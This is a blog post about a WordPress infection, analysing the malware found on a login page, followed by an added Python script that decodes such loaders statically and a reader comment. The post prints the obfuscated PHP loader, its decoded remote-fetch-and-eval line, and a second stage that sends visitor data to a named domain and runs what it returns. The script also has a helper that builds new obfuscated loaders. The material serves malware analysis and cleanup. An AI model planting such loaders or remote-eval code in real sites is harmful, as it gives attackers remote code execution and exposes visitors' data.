So I manage another WordPress blog for a local publication, inherited from another designer. It is on a third-party shared hosting provider, so the server is shared with an unknown number of other websites.

They had been excluded from Google for having bad links on their website (a virus had injected links into their pages!). I fixed this for them and cleaned the site. It took 4 or 5 hours to go through the entire site; the infection was pretty ingrained.

Four months later, their WordPress login page stopped working. Looking at it, I saw:

$Sy1Lz1='Sy1LzNFIy8xJjU9PLYlP';
$Sy1Lz2='zs8rSc0rKdZQyigpKb';
$Sy1Lz3='DS169KTMssSizPL8pJ0UvOz9';
$Sy1Lz4='XPySwu0SupKFHS1LQGAA==';
$Sy1Lz5=$Sy1Lz1.$Sy1Lz2.$Sy1Lz3.$Sy1Lz4;

eval(gzinflate(base64_decode($Sy1Lz5)));

I couldn't find any information on this virus, but decoding the above (base64-decode, then gzinflate) shows that it does nothing except fetch a file from a remote website and execute it, so the real payload never appears in the file on disk. The decoded line is:

eval(file_get_contents("http://zafiraworld.com/list.txt"));

That remote file in turn contains a second stage, which sends the visitor's IP, the site's hostname, the requested URL, language, referer and user agent back to the same domain and executes whatever it returns:

eval(file_get_contents('http://zafiraworld.com/cgi-bin/list.cgi?ipuser='.$_SERVER['REMOTE_ADDR']
    .'&sn='.rawurlencode($_SERVER['SERVER_NAME'])
    .'&host='.rawurlencode($_SERVER['HTTP_HOST'])
    .'&req='.rawurlencode($_SERVER['REQUEST_URI'])
    .'&lg='.rawurlencode($_SERVER['HTTP_ACCEPT_LANGUAGE'])
    .'&ref='.rawurlencode($_SERVER['HTTP_REFERER'])
    .'&ua='.urlencode($_SERVER['HTTP_USER_AGENT'])));
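As an added example (this is not code from the post, and not the malware's own code), the Python below decodes this kind of loader statically, without ever handing the PHP to an interpreter: it resolves the `$Sy1Lz` string concatenation, base64-decodes the blob, raw-inflates it (which is what PHP's gzinflate() does), repeats until no eval(gzinflate(base64_decode(...))) layer is left, and then pulls the URLs and the $_SERVER fields out of the result. The loader and the two quoted stages are taken from this post; the `build_stager` helper (which wraps a plaintext in a loader of the same shape so the decoder can be checked round-trip), its variable prefix and chunk size, and the constructed sample it produces are assumptions of this example.

```python
import base64
import re
import zlib

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*([^;]+);")          # $name = <expr>;
TOKEN_RE = re.compile(r"\$(\w+)|'([^']*)'|\"([^\"]*)\"")   # $var | '..' | ".."
STAGER_RE = re.compile(                                     # group 1: the blob
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(.+?)\s*\)\s*\)\s*\)\s*;", re.S)
URL_RE = re.compile(r"https?://[^\s'\"()]+")
SERVER_RE = re.compile(r"\$_SERVER\['(\w+)'\]")

# The loader exactly as quoted in the post; decoded here statically, never run.
LOADER_FROM_POST = """
$Sy1Lz1='Sy1LzNFIy8xJjU9PLYlP';
$Sy1Lz2='zs8rSc0rKdZQyigpKb';
$Sy1Lz3='DS169KTMssSizPL8pJ0UvOz9';
$Sy1Lz4='XPySwu0SupKFHS1LQGAA==';
$Sy1Lz5=$Sy1Lz1.$Sy1Lz2.$Sy1Lz3.$Sy1Lz4;
eval(gzinflate(base64_decode($Sy1Lz5)));
"""

# The second stage as quoted in the post, used only for IOC extraction below.
STAGE2_FROM_POST = (
    "eval(file_get_contents('http://zafiraworld.com/cgi-bin/list.cgi?ipuser='"
    ".$_SERVER['REMOTE_ADDR'].'&sn='.rawurlencode($_SERVER['SERVER_NAME'])"
    ".'&host='.rawurlencode($_SERVER['HTTP_HOST']).'&req='.rawurlencode($_SERVER['REQUEST_URI'])"
    ".'&lg='.rawurlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']).'&ref='.rawurlencode($_SERVER['HTTP_REFERER'])"
    ".'&ua='.urlencode($_SERVER['HTTP_USER_AGENT'])));"
)


def resolve_php_expr(expr, variables):
    """Concatenate the literals and already-known $vars of a PHP string expression."""
    parts = []
    for var, single, double in TOKEN_RE.findall(expr):
        parts.append(variables[var] if var else (single or double))
    return "".join(parts)


def peel_layer(php_code):
    """Undo one eval(gzinflate(base64_decode(...))) layer statically; None if absent."""
    match = STAGER_RE.search(php_code)
    if match is None:
        return None
    variables = {}
    for name, rhs in ASSIGN_RE.findall(php_code):
        try:
            variables[name] = resolve_php_expr(rhs, variables)
        except KeyError:  # refers to a variable defined elsewhere; skip it
            continue
    blob = resolve_php_expr(match.group(1), variables)
    raw = base64.b64decode(blob, validate=True)
    # wbits=-15: raw DEFLATE without a zlib/gzip header, which is exactly
    # what PHP's gzinflate() consumes.
    return zlib.decompress(raw, -15).decode("utf-8", "replace")


def unwrap_stager(php_code, max_layers=10):
    """Peel nested stager layers; returns (decoded layers, final plaintext)."""
    layers, current = [], php_code
    for _ in range(max_layers):
        decoded = peel_layer(current)
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers, current


def extract_iocs(php_code):
    """Remote URLs and the request fields the code reads from $_SERVER, in order."""
    return {"urls": list(dict.fromkeys(URL_RE.findall(php_code))),
            "server_vars": list(dict.fromkeys(SERVER_RE.findall(php_code)))}


def build_stager(php_code, var_prefix="Sy1Lz", chunk=20):
    """Assumed helper: wrap php_code in a loader shaped like the post's, for testing."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw deflate, as gzdeflate() emits
    b64 = base64.b64encode(comp.compress(php_code.encode()) + comp.flush()).decode()
    chunks = [b64[i:i + chunk] for i in range(0, len(b64), chunk)]
    lines = [f"${var_prefix}{i + 1}='{c}';" for i, c in enumerate(chunks)]
    joined = ".".join(f"${var_prefix}{i + 1}" for i in range(len(chunks)))
    lines.append(f"${var_prefix}{len(chunks) + 1}={joined};")
    lines.append(f"eval(gzinflate(base64_decode(${var_prefix}{len(chunks) + 1})));")
    return "\n".join(lines)


if __name__ == "__main__":
    constructed = build_stager('eval(file_get_contents("http://zafiraworld.com/list.txt"));')
    for label, sample in (("post's loader", LOADER_FROM_POST), ("constructed", constructed)):
        try:
            layers, final = unwrap_stager(sample)
            print(f"{label}: {len(layers)} layer(s) -> {final.strip()}", extract_iocs(final))
        except (ValueError, KeyError, zlib.error) as exc:  # corrupted or partial copy
            print(f"{label}: could not decode ({exc})")
    print("second stage:", extract_iocs(STAGE2_FROM_POST))
```

The decoder deliberately never evaluates anything: the base64 blob is reassembled by string concatenation only, so a loader that has been copied with a typo fails with a zlib or base64 error rather than running. The same STAGER_RE is what you would grep for across the whole document root (themes, plugins, uploads, not just wp-login.php), since a loader of this shape is rarely the only copy on a shared host.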

If anyone else has seen this, please write on my blog here in my comments section. Let’s track this down.

Comments

One Response to “Virus found on wordpress blog”

  1. VJ on October 4th, 2008 10:13 pm

    Found similar code in much larger quantities. It seems that mine was a WordPress backdoor which allows total access to the whole account, with full permissions to write, delete, etc. I'm still trying to figure out how I was infected, since I didn't use anything but the clean WordPress (no additional components). Weird.
    VJ.